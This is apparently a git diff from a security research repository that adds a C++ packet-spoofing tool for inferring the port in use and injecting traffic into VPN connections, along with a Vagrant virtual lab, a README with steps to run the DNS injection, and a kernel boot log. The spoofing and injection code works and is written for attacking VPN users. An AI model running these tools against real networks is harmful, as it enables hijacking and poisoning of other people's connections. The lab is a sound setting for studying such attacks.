+ int sport = atoi(argv[2]); + string dest_ip = argv[3]; + int dport = atoi(argv[4]); + + cout << "trying to inject dns to port " << dport << "\n"; + + int p = send_dns(src_ip, sport, dest_ip, dport); + + return p; +} diff --git a/server-side-attack/dns-sside/phases/udder_test/uud_send b/server-side-attack/dns-sside/phases/udder_test/uud_send new file mode 100755 index 0000000..96b98bd Binary files /dev/null and b/server-side-attack/dns-sside/phases/udder_test/uud_send differ diff --git a/server-side-attack/tcp-sside/Makefile b/server-side-attack/tcp-sside/Makefile new file mode 100644 index 0000000..1adaa90 --- /dev/null +++ b/server-side-attack/tcp-sside/Makefile @@ -0,0 +1,2 @@ +all: + g++ -O3 -o tcp_send send.cpp -lpthread -ltins -std=c++11 diff --git a/server-side-attack/tcp-sside/send.cpp b/server-side-attack/tcp-sside/send.cpp new file mode 100644 index 0000000..a33b551 --- /dev/null +++ b/server-side-attack/tcp-sside/send.cpp @@ -0,0 +1,230 @@ +#include +#include +#include +#include +#include +#include + + +using std::thread; +using std::cout; +using std::string; +using std::vector; +using namespace Tins; + + +int current_spoof_port, best_port, chack_count; +bool is_running = true; +bool verbose = false; + + +bool sniffed_resp = false; +string dest_ip; +string source_ip; + + + +void print_divider(int count) { + int i = 0; + while (i < count) { + if (verbose) cout << "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n"; + i++; + } +} + +bool handle_send_packet(PDU &some_pdu) { + + const IP &ip = some_pdu.rfind_pdu(); // Grab IP layer of sniffed packet + + if (ip.src_addr() == source_ip) { + current_spoof_port = some_pdu.rfind_pdu().dport(); + //cout << "Current Spoof Port (sniff) = " << current_spoof_port << "\n"; + } + if (ip.src_addr() == dest_ip) { + + const uint32_t& payload = some_pdu.rfind_pdu().payload_size(); + //cout << "Payload Size = " << payload << "\n"; + const int remainder = payload % 115; + } + + return is_running; + +} + +bool handle_packet(PDU &some_pdu) { + + const IP &ip = some_pdu.rfind_pdu(); // Grab IP layer of sniffed packet + + // in this case we're looking for a packet from the vpn server to the vpn client + // + // the src ip should be the VPN server and dest ip should be + // public address of victim + + if (ip.src_addr() == dest_ip) { // dest_ip should be public VPN IP + + const uint32_t& payload = some_pdu.rfind_pdu().payload_size(); + //cout << "Payload size: " << payload << "\n"; + if (payload == 99) { // could be a NAT'ed attacker packet + + cout << "sniffed response from VPN server with port: " << current_spoof_port << " and size: " << payload << " \n"; + best_port = current_spoof_port; + sniffed_resp = true; + + } + } + + return is_running; +} + +void sniff_stuff() { + SnifferConfiguration config; + config.set_promisc_mode(true); + //config.set_filter("ip dst 10.0.0.215"); + // would want to filter out ssh stuff at some point + Sniffer sniffer("any", config); + sniffer.sniff_loop(handle_packet); + +} + + +void sniff_send_stuff() { + + SnifferConfiguration config; + config.set_promisc_mode(true); + Sniffer sniffer("any", config); + sniffer.sniff_loop(handle_send_packet); + +} + + + + +// Spreads SYNs across the victim's entire port range +// coming from a specific remote_ip:port +// +int phase_two_spread(string source_ip, int sport, string dest_ip, int start_port, int end_port) { + + PacketSender sender; + NetworkInterface iface("enp0s9"); + + IP pkt = IP(dest_ip, source_ip) / TCP(40400, sport); + TCP& tcp = pkt.rfind_pdu(); + tcp.flags(TCP::SYN | TCP::ACK); + + int current_port = best_port; + int count = 0; + int i = start_port; + bool found = false; + + + while (i < end_port && !found) { + tcp.dport(i); + sender.send(pkt, iface); + //cout << "Current port= " << i << "\n"; + usleep(500); + count++; + i ++; + if (count % 50 == 0) { + usleep(1000); + cout << " Current port = " << i << ". Best port = " << best_port << ".\n"; + } + + if (best_port != 0) found = true; + + } + + usleep(1000000); // sleep to give victim time to respond w chack + + current_port = best_port; + + if (verbose) cout << "finished round 1 w guessed port: " << current_port << "\n"; + + // In round 1 we spoofed really fast (10 sleep) to get a good estimate of the + // port in use. Round 2, we spoof slower from about 50 packets back to account + // for the delay in response and hopefully get the exact port number in use. + print_divider(1); + usleep(1000000 / 2); + // sniffed_chack = false; + int j = current_port - 300; + found = false; + best_port = 0; + + while (j < (current_port + 300) && !found) { + tcp.dport(j); // set the packets dest port to current guess + sender.send(pkt, iface); + cout << "Current guess port = " << j << " and best port = " << best_port << " \n"; + usleep(10000); + j ++; + if (best_port != 0) found = true; + } + + usleep(1000000); + + if (verbose) cout << "finished round 2 w guessed port: " << best_port << "\n"; + + return best_port; + + + +} + + +int find_port(string source_ip, int sport, string dest_ip, int start_port, int end_port) { + + bool is_found = false; + int current_port = 0; + + while (!is_found) { + + current_port = phase_two_spread(source_ip, sport, dest_ip, start_port, end_port); + print_divider(1); + + if (verbose) cout << "finished phase 2 w possible port: " << current_port << "\n"; + + is_found = true; + + } + + return current_port; + +} + + + + +int main(int argc, char** argv) { + + if (argc != 4) { + cout << "sike wrong number of args ---> (source_ip, sport, dest_ip)\n"; + return 0; + } + + source_ip = argv[1]; // web server IP + int sport = atoi(argv[2]); // most likely 80 or 443 + dest_ip = argv[3]; // vpn server IP + verbose = true; + + int start_port = 32768; + int end_port = 61000; + + print_divider(2); + + thread sniff_thread(sniff_stuff); + thread send_sniff_thread(sniff_send_stuff); + + int p = find_port(source_ip, sport, dest_ip, start_port, end_port); + + //cout << p << "\n"; + print_divider(1); + //if (verbose) cout << "Completed phase 2 with port: " << p << "\n\n"; + + //if (verbose) cout << "Attempting to spoof DNS back on port ..\n"; + //int res = spoof_dns(source_ip, sport, dest_ip, p); + + is_running = false; + sniff_thread.join(); + send_sniff_thread.join(); + + + return p; +} diff --git a/virtual-test-environment/README.md b/virtual-test-environment/README.md index e69de29..1c49f4a 100644 --- a/virtual-test-environment/README.md +++ b/virtual-test-environment/README.md @@ -0,0 +1,72 @@ +# virt-lab +VM lab environment for testing on-path VPN attacks + + +### Requirements + +* Virtualbox (5.2 or older) +* Vagrant 2.2.x + + +### Setup base virtual network + +1. Start all 6 VMs (3 routers and 3 edge nodes): `cd virt-lab; ./boot_all.sh` +2. Go do something else cause its gonna take a while.. +3. ssh to some machine: + * ssh by port: `ssh -l vagrant localhost -p 22111` + * ssh with vagrant: `cd edgers/vpn-server/; vagrant ssh` or `cd ; vagrant ssh` +4. Restart all the machines to make network changes take effect: `./stop_all.sh` then `./start_all.sh` +5. Make sure edge nodes can ping eachother: `ping 192.168.3.2` + +![picture](diagrams/virtlab-setup.jpg) + + +#### Build VPN server + +1. Copy setup scripts to vpn server VM: `cd virt-lab/edgers/vpn-server; ./copy_vpn_setup.sh` +2. Ssh to vpn server VM: `cd virt-lab/edgers/vpn-server; vagrant ssh` +3. Run interactive script to setup vm as a OpenVPN server: `./setup_vpn.sh` +* Keep hitting `Enter` or `y` to leave all default values +4. Run script to generate client config file: `./make_client_configs.sh` + +#### Connect client to VPN server + +1. Run script to copy `client1` config file from vpn server to client vm: `cd virt-lab/edgers/client; ./copy_client_config.sh` +2. Ssh to the client VM: `cd virt-lab/edgers/client; vagrant ssh` +2. Install OpenVPN on the client vm: `./connect.sh` +3. Connect to the local vpn server: `sudo openvpn --client --config client1.ovpn &` + +#### Setup DNS server on "web-server" node + +1. Run script to copy dns setup scripts to vm: `cd virt-lab/edgers/web-server; ./copy_dns_setup.sh` +2. Ssh to server vm: `cd virt-lab/edgers/web-server; vagrant ssh` +3. Run docker install script: `./install_docker.sh` +4. Start the dns bind docker container: `./start_dns.sh` (may need to log back in for new docker permissions) +5. Check to make sure its alivee: `docker ps` or `docker logs bind` + + +#### Setup attack router for dns inject attack + +1. Start script to copy attacker setup to vm: `cd virt-lab/routers/router1; ./copy_attacker_setup.sh` +2. Ssh to router vm: `cd virt-lab/routers/router1; vagrant ssh` +3. Run the setup script to install spoofing libraries and repo: `./setup_attacker.sh` +4. Change to dns attack folder: `cd VeepExploit/server-side-attack/dns-sside/full_scan` +5. Compile the attack script: `make` +6. Run the attack: `sudo ./uud_send ` + + + + +### Test the DNS Injection + +1. Either run the overload script or simply turn off the local DNS server to ensure the real responses do not beat our injected responses: `docker stop bind` (on web-server VM) +2. Query for our test domain from the VPN client node: `nslookup yo.com 192.168.3.2` (`yo.com` is hardcoded as the domain name response in the injection script)3. Make sure there is a `conntrack` entry on the VPN server for our clients lookup: `sudo conntrack -L | grep 192.168.3.2 | grep udp` +4. Start the injection script from the attack node once the client has issued the request: `sudo ./uud_send 192.168.3.2 53 192.168.2.2 32000 62000` + + +### Teardown + +1. Stop all the VMs: `./stop_all.sh` +2. Destroii all VMs in our path: `./destroy_all.sh` + + diff --git a/virtual-test-environment/boot_all.sh b/virtual-test-environment/boot_all.sh new file mode 100755 index 0000000..2614505 --- /dev/null +++ b/virtual-test-environment/boot_all.sh @@ -0,0 +1,70 @@ +#!/bin/bash +# + + +BORDER="~~~~~~~~~~~~~~~~~~~~~~~~~~~" + +printf "$BORDER Starting all 3 routers \n" + +printf "\n$BORDER Booting router 1 \n" + +cd routers/router1 +vagrant up + +echo "$BORDER Finished booting router 1" + + +printf "\n$BORDER Booting router 2 \n" + +cd ../router2 +vagrant up + +echo "$BORDER Finished booting router 2" + + +printf "\n$BORDER Booting router 3 \n" + +cd ../router3 +vagrant up + +echo "$BORDER Finished booting router 3" + +printf "\n$BORDER Booting gateway node\n" + +cd ../gateway +vagrant up + +echo "$BORDER Finished booting gateway" + +cd ../.. +sleep 2 + +RUNNERS=$(vboxmanage list runningvms) + +echo "Current running VMs: $RUNNERS" + + +printf "$BORDER Booting the 3 edge nodes .. \n" + +printf "\n$BORDER Booting the client \n" + +cd edgers/client +vagrant up + +echo "$BORDER Finished booting client.." + + +printf "\n$BORDER Booting the vpn server \n" + +cd ../vpn-server +vagrant up + +echo "$BORDER Finished booting vpn server.." + + +printf "\n$BORDER Booting the web server \n" + +cd ../web-server +vagrant up + +echo "$BORDER Finished booting web server.." diff --git a/virtual-test-environment/destroy_all.sh b/virtual-test-environment/destroy_all.sh new file mode 100755 index 0000000..24d8996 --- /dev/null +++ b/virtual-test-environment/destroy_all.sh @@ -0,0 +1,36 @@ +#!/bin/bash +# + + +echo "Shutting down and deleting all vagrant vms.." + + +echo "Destroying router 1.." +cd routers/router1 +vagrant destroy -f + +echo "Destroying router 2.." +cd ../router2 +vagrant destroy -f + +echo "Destroying router 3.." +cd ../router3 +vagrant destroy -f + +echo "Destroying gateway.." +cd ../gateway +vagrant destroy -f + +cd ../.. + +echo "Destroying client vm.." +cd edgers/client +vagrant destroy -f + +echo "Destroying vpn server vm.." +cd ../vpn-server +vagrant destroy -f + +echo "Destroying web server vm.." +cd ../web-server +vagrant destroy -f diff --git a/virtual-test-environment/diagrams/virtlab-setup.jpg b/virtual-test-environment/diagrams/virtlab-setup.jpg new file mode 100644 index 0000000..bb22c4f Binary files /dev/null and b/virtual-test-environment/diagrams/virtlab-setup.jpg differ diff --git a/virtual-test-environment/edgers/client/.vagrant/machines/default/virtualbox/vagrant_cwd b/virtual-test-environment/edgers/client/.vagrant/machines/default/virtualbox/vagrant_cwd new file mode 100644 index 0000000..6e06274 --- /dev/null +++ b/virtual-test-environment/edgers/client/.vagrant/machines/default/virtualbox/vagrant_cwd @@ -0,0 +1 @@ +/home/jive/space/gittin/VeepExploit/virt-lab/edgers/client \ No newline at end of file diff --git a/virtual-test-environment/edgers/client/Vagrantfile b/virtual-test-environment/edgers/client/Vagrantfile new file mode 100644 index 0000000..1a1f303 --- /dev/null +++ b/virtual-test-environment/edgers/client/Vagrantfile @@ -0,0 +1,20 @@ +# -*- mode: ruby -*- + +# vi: set ft=ruby : + +Vagrant.configure(2) do |config| + config.vm.box = "ubuntu/xenial64" + config.vm.hostname = "vague-client" + + config.vm.network "forwarded_port", guest: 22, host: 22111, id: 'ssh' + config.ssh.insert_key = true + + config.vm.network "private_network", ip: "172.16.4.2", virtualbox__intnet: "intnet-4" + + config.vm.provider "virtualbox" do |vb| + vb.name = "vague-client" + end + + config.vm.provision :shell, path: "setup_net.sh" + +end diff --git a/virtual-test-environment/edgers/client/copy_client_config.sh b/virtual-test-environment/edgers/client/copy_client_config.sh new file mode 100755 index 0000000..3372568 --- /dev/null +++ b/virtual-test-environment/edgers/client/copy_client_config.sh @@ -0,0 +1,20 @@ +#!/bin/bash +# + +cd ../vpn-server/ + +echo "Copying client1 config file from vpn server vm.." +scp -i .vagrant/machines/default/virtualbox/private_key -P 22112 vagrant@localhost:~/client-configs/files/client1* . + +mv -v client1* ../client + +cd ../client + +echo "Copying client config file to client vm.." +scp -i .vagrant/machines/default/virtualbox/private_key -P 22111 client1.ovpn vagrant@localhost:~ + + +echo "Copying connect script.." +scp -i .vagrant/machines/default/virtualbox/private_key -P 22111 ../setups/attacker/connect.sh vagrant@localhost:~ + + diff --git a/virtual-test-environment/edgers/client/setup_net.sh b/virtual-test-environment/edgers/client/setup_net.sh new file mode 100755 index 0000000..ce6d844 --- /dev/null +++ b/virtual-test-environment/edgers/client/setup_net.sh @@ -0,0 +1,14 @@ +#!/bin/bash +# + + +OLD_NAME=vague-client +HNAME=client1 + +sed -i "s/$OLD_NAME/$HNAME/g" /etc/hostname +sed -i "s/$OLD_NAME/$HNAME/g" /etc/hosts +hostname $HNAME + +sed -i "s/#VAGRANT-END/up route add -net 172.16.0.0\/16 gw 172.16.4.254 dev enp0s8\nup route add -net 192.168.0.0\/16 gw 172.16.4.254 dev enp0s8/g" /etc/network/interfaces +#/etc/init.d/networking restart +exit diff --git a/virtual-test-environment/edgers/client/ubuntu-xenial-16.04-cloudimg-console.log b/virtual-test-environment/edgers/client/ubuntu-xenial-16.04-cloudimg-console.log new file mode 100644 index 0000000..5be4f38 --- /dev/null +++ b/virtual-test-environment/edgers/client/ubuntu-xenial-16.04-cloudimg-console.log @@ -0,0 +1,650 @@ +[ 0.000000] Initializing cgroup subsys cpuset +[ 0.000000] Initializing cgroup subsys cpu +[ 0.000000] Initializing cgroup subsys cpuacct +[ 0.000000] Linux version 4.4.0-190-generic (buildd@lcy01-amd64-026) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.12) ) #220-Ubuntu SMP Fri Aug 28 23:02:15 UTC 2020 (Ubuntu 4.4.0-190.220-geeric 4.4.233) +[ 0.000000] Command line: BOOT_IMAGE=/boot/vmlinuz-4.4.0-190-gneric root=LABEL=cloudimgrootfs ro console=tty1 console=ttyS0 +[ 0.000000] KERNEL supported cpus: +[ 0.000000] Intel GenuineIntel +[ 0.000000] AMD AuthenticAMD +[ 0.000000] Centaur CentaurHauls +[ 0.000000] x86/fpu: xstate_offset[2]: 576, xstate_sizes[2]: 256 +[ 0.000000] x86/fpu: Supporting XSAVE feature 0x01: 'x87 floating point registers' +[ 0.000000] x86/fpu: Supporting XSAVE feature 0x02: 'SSE registers' +[ 0.000000] x86/fpu: Supporting XSAVE feature 0x04: 'AVX registers' +[ 0.000000] x86/fpu: Enabled xstate features 0x7, context size is 832 bytes, using 'stadard' format. +[ 0.000000] e820: BIOS-provided physical RAM map: +[ 0.000000] BIOS-e820: [mem 0x0000000000000000-0x000000000009fbff] usable +[ 0.000000] BIO-e820: [mem 0x000000000009fc00-0x000000000009ffff] reserved +[ 0.000000] BIOS-e820: [mem 0x00000000000f0000-0x00000000000fffff] reserved +[ 0.000000] BIOS-e820: [mem 0x0000000000100000-0x000000003ffeffff] usable +[ 0.000000] BIOS-e820: [mem 0x000000003fff0000-0x000000003fffffff] ACPI data +[ 0.000000] BIOS-e820: [mem 0x00000000fec00000-0x00000000fec00fff] reserved +[ 0.000000] BIOS-e820: [mem 0x00000000fee00000-0x00000000fee00fff] reserved +[ 0.000000] BIOS-e820: [mem 0x00000000fffc0000-0x00000000ffffffff] reserved +[ 0.000000] NX (Execute Disable) protection: active +[ 0.000000] SMBIOS 2.5 present. +[ 0.000000] Hypervisor detected: KVM +[ 0.000000] e820: last_pfn = 0x3fff0 max_arch_pfn = 0x400000000 +[ 0.000000] MTRR: Disabled +[ 0.000000] x86/PAT: MTRRs disabled, skipping PAT initialization too. +[ 0.000000] CPU MTRRs all blank - virtualized system. +[ 0.000000] x86/PAT: Configuration [0-7]: WB WT UC- UC WB WT UC- UC +[ 0.000000] found SMP MP-table at [mem 0x0009fff0-0x0009ffff] mapped at [ffff88000009fff0] +[ 0.000000] Scanning 1 areas forlow memory corruption +[ 0.000000] RAMDISK: [mem 0x362e000-0x37167fff] +[ 0.000000] ACPI: Early table checksum verification disabled +[ 0.000000] ACPI: RSDP 0x00000000000E0000 000024 (v02 VBOX ) +[ 0.000000] ACPI: XSDT 0x000000003FFF0030 00003C (v01 VBOX VBOXXSDT 00000001 ASL 00000061) +[ 0.000000] ACPI: FACP 0x000000003FFF00F0 0000F4 (v04 VBOX VBOXFACP 00000001 ASL 00000061) +[ 0.000000] ACPI: DSDT 0x000000003FFF0470 0021FF (v02 VBOX VBOXBIOS 00000002 INTL 20180105) +[ 0.000000] ACPI: FACS 0x000000003FFF0200 000040 +[ 0.000000] ACPI: FACS 0x000000003FFF0200 000040 +[ 0.000000] ACPI: APIC 0x000000003FFF0240 00005C (v02 VBOX VBOXAPIC 00000001 ASL 00000061) +[ 0.000000] ACPI: SSDT 0x000000003FFF02A0 0001CC (v01 VBOX VBOXCPUT 00000002 INTL 20180105) +[ 0.000000] No NUMA configuration found +[ 0.000000] Faking a node at [mem 0x0000000000000000-0x000000003ffeffff] +[ 0.000000] NODE_DATA(0) allocated [mem 0x3ffeb000-0x3ffeffff] +[ 0.000000] kvm-clock: Using msrs 4b564d01 and 4b54d00 +[ 0.000000] kvm-clock: cpu 0, msr 0:3ffe3001, primary cpu clock +[ 0.000000] kvm-clock: using sched offset of 4082191642 cycles +[ 0.000000] clocksource: kvm-clock: mask: 0xffffffffffffffff max_cycles: 0x1cd42e4dffb, max_idle_ns: 881590591483 ns +[ 0.000000] Zone ranges: +[ 0.000000] DMA [mem 0x0000000000001000-0x0000000000ffffff] +[ 0.000000] DMA32 [mem 0x0000000001000000-0x000000003ffeffff] +[ 0.000000] Normal empty +[ 0.000000] Device empty +[ 0.000000] Movable zone start for each node +[ 0.000000] Early memory node ranges +[ 0.000000] node 0: [mem 0x0000000000001000-0x000000000009efff] +[ 0.000000] node 0: [mem 0x0000000000100000-0x000000003ffeffff] +[ 0.000000] Initmem setup node 0 [mem 0x0000000000001000-0x000000003ffeffff] +[ 0.000000] ACPI: PM-Timer IO Port: 0x4008 +[ 0.000000] IOAPIC[0]: apic_id 2, version 32, address 0xfec00000, GSI 0-23 +[ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 0 global_irq 2 dfl dfl) +[ 0.000000] ACPI: INT_SRC_OVR (bus 0 bu_irq 9 global_irq 9 low level) +[ 0.000000] Using ACPI (MADT) for SMP configuration information +[ 0.000000] smpboot: Allowing 2 CPUs, 0 hotplug CPUs +[ 0.000000] PM: Registered nosave memory: [mem 0x00000000-0x00000fff] +[ 0.0000000] PM: Registered nosave memory: [mem 0x0009f000-0x0009ffff] +[ 0.000000] PM: Registered nosave memory: [mem 0x000a0000-0x000effff] +[ 0.000000] PM: Registered nosave memory: [mem 0x000f0000-0x000fff] +[ 0.000000] e820: [mem 0x40000000-0xfebfffff] available for PCI devices +[ 0.000000] Booting paravirtualized kernel on KVM +[ 0.000000] clocksource: refined-jiffies: mask: 0xffffffff max_cycles: 0xffffffff, max_idle_ns: 7645519600211568 ns +[ 0.000000] setup_percpu: NR_CPU:512 nr_cpumask_bits:512 nr_cpu_ids:2 nr_node_ids:1 +[ 0.000000] PERCPU: Embedded 33 pages/cpu @ffff88003fc00000 s95512 r8192 d31464 u1048576 +[ 0.000000] Built 1 zonelists in Node order, mobility grouping on. Total pages: 257912 +[ 0.000000] Polcy zoe: DMA32 +[ 0.00000] Kernel command line: BOOT_IMAGE=/boot/vmlinuz-4.4.0-190-generic root=LABEL=cloudimg-rootfs ro console=tty1 console=ttyS0 +[ 0.000000] PID hash table entres: 4096 (order: 3, 32768 bytes) +[ 0.000000] Memory: 997664K/1048120K available (8636K kernel code, 1337K rwdata, 4040K rodata, 1492K init, 1296K bss, 50456K reserved, 0K cma-reserved) +[ 0.000000] SLUB: HWalign=64, Order=0-3, MinObjects=0, CPUs=2, Nodes=1 +[ 0.000000] Kernel/User pa tables isolation: enabled +[ 0.000000] Hierarchical RCU implementation. +[ 0.000000] Build-time adjustment of leaf fanout to 64. +[ 0.000000] RCU restricting CPUs from NR_CPUS=512 to nr_cpu_ids=2. +[ 0.000000] RCU: Adjusting geometry for rcu_fanut_leaf=64, nr_cpu_ids=2 +[ 0.000000] NR_IRQS:33024 nr_irqs:440 16 +[ 0.000000] Console: colour VGA+ 80x25 +[ 0.000000] console [tty1] enabled +[ 0.000000] console [ttyS0] enabled +[ 0.000000] tsc: Detected 2207.998 MHz processor +[ 1.041791] Calibrating delay loop (skipped) preset value.. 4415.99 BogoMIPS (lpj=8831992) +[ 1.052454] pid_max: default: 32768 minimum: 301 +[ 1.053996] ACPI: Core revision 20150930 +[ 1.091681] ACPI: 2 ACPI AML tables successfully acquired and loaded +[ 1.134566] Security Framework initialized +[ 1.141633] Yama: becoming mindful. +[ 1.143203] AppArmor: AppArmor initialized +[ 1.145048] Dentry cache hash table entries: 131072 (order: 8, 1048576 bytes) +[ 1.151090] Inode-cache hash table entries: 65536 (order: 7, 524288 bytes) +[ 1.155809] Mount-cache hash table entries: 2048 (order: 2, 16384 bytes) +[ 1.164580] Mountpoint-cache hash table entries: 2048 (order: 2, 16384 bytes) +[ 1.172192] Initializing cgroup subsys io +[ 1.183941] Initializing cgroup subsys memory +[ 1.187985] Initializing cgroup subsys devices +[ 1.189126] Initializing cgroup subsys freezer +[ 1.191162] Initializing cgroup subsys net_cls +[ 1.200382] Initializing cgroup subsys perf_event +[ 1.207094] Initializing cgroup subsys net_prio +[ 1.225711] Initializing cgroup subsys hugetlb +[ 1.234444] Initializing cgroup subsys pids +[ 1.267429] mce: CPU supports 0 MCE banks +[ 1.277762] Last level iTLB entries: 4KB 64, 2MB 8, 4MB 8 +[ 1.294662] Last level dTLB entries: 4KB 64, 2MB 0, 4MB 0, 1GB 4 +[ 1.299689] Spectre V1 : Mitigation: usercopy/swapgs barriers and __user pointer sanitization +[ 1.303783] Spectre V2 : Mitigation: Full generic retpoline +[ 1.306772] Spectre V2 : Spectre v2 / SpectreRSB mitigation: Filling RSB on context switch +[ 1.313338] Speculative Store Bypass: Vulnerable +[ 1.323442] SRBDS: Unknown: Dependent on hypervisor status +[ 1.327384] MDS: Mitigation: Clear CPU buffers +[ 1.341396] Freeing SMP alternatives memory: 36K +[ 1.373736] ftrace: allocating 32339 entries in 127 pages +[ 1.570892] smpboot: APIC(0) Converting physical 0 to logical package 0 +[ 1.577500] smpboot: Max logical packages: 1 +[ 1.578775] x2apic enabled +[ 1.584448] Switched APIC routing to physical x2apic. +[ 1.611479] ..TIMER: vector=0x30 apic1=0 pin1=2 apic2=-1 pin2=-1 +[ 1.721452] APIC calibration not consistent with PM-Timer: 98ms instead of 100ms +[ 1.752323] APIC delta adjusted to PM-Timer: 6249636 (6166268) +[ 1.766711] smpboot: CPU0: Intel(R) Core(TM) i3-8130U CPU @ 2.20GHz (family: 0x6, model: 0x8e, stepping: 0xa) +[ 1.779907] Performance Events: unsupported p6 CPU model 142 no PMU driver, software events only. +[ 1.823978] KVM setup paravirtual spinlock +[ 1.844532] x86: Booting SMP configuration: +[ 1.846154] .... node #0, CPUs: #1 +[ 1.855087] kvm-clock: cpu 1, msr 0:3ffe3041, secondary cpu clock +[ 1.906425] mce: CPU supports 0 MCE banks +[ 1.913784] x86: Booted up 1 node, 2 CPUs +[ 1.923654] smpboot: Total of 2 processors activated (8831.99 BogoMIPS) +[ 1.932016] devtmpfs: initialized +[ 1.948865] evm: security.selinux +[ 1.959303] evm: security.SMACK64 +[ 1.961627] evm: security.SMACK64EXEC +[ 1.962388] evm: security.SMACK64TRANSMUTE +[ 1.986831] evm: security.SMACK64MMAP +[ 1.999663] evm: security.ima +[ 2.000776] evm: security.capability +[ 2.015490] clocksource: jiffies: mask: 0xffffffff max_cycles: 0xffffffff, max_idle_ns: 7645041785100000 ns +[ 2.019114] futex hash table entries: 512 (order: 3, 32768 bytes) +[ 2.020986] pinctrl core: initialized pinctrl subsystem +[ 2.043244] RTC time: 22:38:15, date: 01/25/21 +[ 2.051212] NET: Registered protocol family 16 +[ 2.079301] cpuidle: using governor ladder +[ 2.091373] cpuidle: using governor menu +[ 2.109133] PCCT header not found. +[ 2.116628] ACPI: bus type PCI registered +[ 2.132780] acpiphp: ACPI Hot Plug PCI Controller Driver version: 0.5 +[ 2.145019] PCI: Using configuration type 1 for base access +[ 2.171956] ACPI: Added _OSI(Module Device) +[ 2.180922] ACPI: Added _OSI(Processor Device) +[ 2.205096] ACPI: Added _OSI(3.0 _SCP Extensions) +[ 2.212773] ACPI: Added _OSI(Processor Aggregator Device) +[ 2.253682] ACPI: Executed 1 blocks of module-level executable AML code +[ 2.294982] ACPI: Interpreter enabled +[ 2.304830] ACPI: (supports S0 S5) +[ 2.324785] ACPI: Using IOAPIC for interrupt routing +[ 2.327228] PCI: Using host bridge windows from ACPI; if necessary, use "pci=nocrs" and report a bug +[ 2.353177] ACPI: PCI Root Bridge [PCI0] (domain 0000 [bus 00-ff]) +[ 2.365063] acpi PNP0A03:00: _OSC: OS supports [ASPM ClockPM Segments MSI] +[ 2.390076] acpi PNP0A03:00: _OSC: not requesting OS control; OS requires [ExtendedConfig ASPM ClockPM MSI] +[ 2.400220] acpi PNP0A03:00: fail to add MMCONFIG information, can't access extended PCI configuration space under this bridge. +[ 2.409635] PCI host bridge to bus 0000:00 +[ 2.413298] pci_bus 0000:00: root bus resource [io 0x0000-0x0cf7 window] +[ 2.416237] pci_bus 0000:00: root bus resource [io 0x0d00-0xffff window] +[ 2.427435] pci_bus 0000:00: root bus resource [mem 0x000a0000-0x000bffff window] +[ 2.464047] pci_bus 0000:00: root bus resource [mem 0x40000000-0xfdffffff window] +[ 2.484616] pci_bus 0000:00: root bus resource [bus 00-ff] +[ 2.537475] pci 0000:00:01.1: legacy IDE quirk: reg 0x10: [io 0x01f0-0x01f7] +[ 2.543409] pci 0000:00:01.1: legacy IDE quirk: reg 0x14: [io 0x03f6] +[ 2.569429] pci 0000:00:01.1: legacy IDE quirk: reg 0x18: [io 0x0170-0x0177] +[ 2.582226] pci 0000:00:01.1: legacy IDE quirk: reg 0x1c: [io 0x0376] +[ 2.612300] pci 0000:00:07.0: quirk: [io 0x4000-0x403f] claimed by PIIX4 ACPI +[ 2.614098] pci 0000:00:07.0: quirk: [io 0x4100-0x410f] claimed by PIIX4 SMB +[ 2.647067] ACPI: PCI Interrupt Link [LNKA] (IRQs 5 9 10 *11) +[ 2.682353] ACPI: PCI Interrupt Link [LNKB] (IRQs 5 9 *10 11) +[ 2.689977] ACPI: PCI Interrupt Link [LNKC] (IRQs 5 *9 10 11) +[ 2.724348] ACPI: PCI Interrupt Link [LNKD] (IRQs 5 9 10 *11) +[ 2.748998] ACPI: Enabled 2 GPEs in block 00 to 07 +[ 2.752768] vgaarb: setting as boot device: PCI:0000:00:02.0 +[ 2.755682] vgaarb: device added: PCI:0000:00:02.0,decodes=io+mem,owns=io+mem,locks=none +[ 2.783660] vgaarb: loaded +[ 2.808670] vgaarb: bridge control possible 0000:00:02.0 +[ 2.811991] SCSI subsystem initialized +[ 2.823706] ACPI: bus type USB registered +[ 2.826389] usbcore: registered new interface driver usbfs +[ 2.829131] usbcore: registered new interface driver hub +[ 2.848781] usbcore: registered new device driver usb +[ 2.855831] PCI: Using ACPI for IRQ routing +[ 2.859935] NetLabel: Initializing +[ 2.861112] NetLabel: domain hash size = 128 +[ 2.882446] NetLabel: protocols = UNLABELED CIPSOv4 +[ 2.899911] NetLabel: unlabeled traffic allowed by default +[ 2.901551] amd_nb: Cannot enumerate AMD northbridges +[ 2.903022] clocksource: Switched to clocksource kvm-clock +[ 2.924924] AppArmor: AppArmor Filesystem Enabled +[ 2.926027] pnp: PnP ACPI init +[ 2.929410] pnp: PnP ACPI: found 3 devices +[ 2.948338] clocksource: acpi_pm: mask: 0ffffff max_cycles: 0xffffff, max_idle_ns: 2085701024 ns +[ 3.095853] NET: Registered protocol family 2 +[ 3.102833] TCP established hash table entries: 8192 (order: 4, 65536 bytes) +[ 3.107417] TCP bind hash table entries: 8192 (order: 5, 131072 bytes) +[ 3.123126] TCP: Hash tables configured (established 8192 bind 8192) +[ 3.134673] UDP hash table entries: 512 (order: 2, 16384bytes) +[ 3.205327] UDP-Lite hash table entries: 512 (order: 2, 16384 bytes) +[ 3.207915] NET: Registerd protocol family 1 +[ 3.297769] pci 0000:0:00.0: Limiting direct PCI/PCI transfers +[ 3.396647] pci 0000:00:01.0: Activating ISA DMA hang workarounds +[ 3.471672] Unpacking initramfs... + +[ 3.970575] Freeing initrd memory: 14880K +[ 3.984183] clocksource: tsc: mask: 0xffffffffffffffff max_cycles: 0x1fd3b6211b4, max_idle_ns: 440795230313 ns +[ 3.992274] platform rtc_cmos: registered platform RTC device (no PNP device found) +[ 3.995566] Scanning for low memory corruption every 60 seconds +[ 4.011033] audit: initializing netlink subsys (disabled) +[ 4.013138] audit: type=2000 audit(1611614300.723:1): initialized +[ 4.015868] Initialise system trusted keyring +[ 4.019301] HugeTLB registered 2 MB page size, pre-allocated 0 pages +[ 4.023298] zbud: loaded +[ 4.029526] VFS: Disk quotas dquot_6.6.0 +[ 4.032786] VFS: Dquot-cache hash table entries: 512 (order 0, 4096 bytes) +[ 4.035391] squashfs: version 4.0 (2009/01/31) Phillip Lougher +[ 4.042630] fusenit (API version 7.23) + +[ 4.092170] Key type big_key registered +[ 4.093044] Allocating IMA MOK and blacklist keyrings. +[ 4.105668] Key type asymmetric registered +[ 4.106543] Asymmetric key parser 'x509' registered +[ 4.107551] Block layer SCSI generic (bsg) driver version 0.4 